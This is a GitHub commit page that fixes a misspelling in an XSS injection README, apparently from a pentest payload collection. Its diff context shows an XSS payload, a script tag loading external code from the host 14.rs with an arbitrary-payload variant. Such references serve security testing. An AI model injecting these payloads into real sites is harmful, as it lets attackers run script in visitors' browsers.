Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
Correct misspelling
  • Loading branch information
Isopach authored Jul 31, 2018
1 parent 6524c8e commit 8e26277
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion XSS injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -92,7 +92,7 @@ XSS for HTML5
XSS using script tag (external payload)
```javascript
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
you can also specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```

Expand Down

0 comments on commit 8e26277

Please sign in to comment.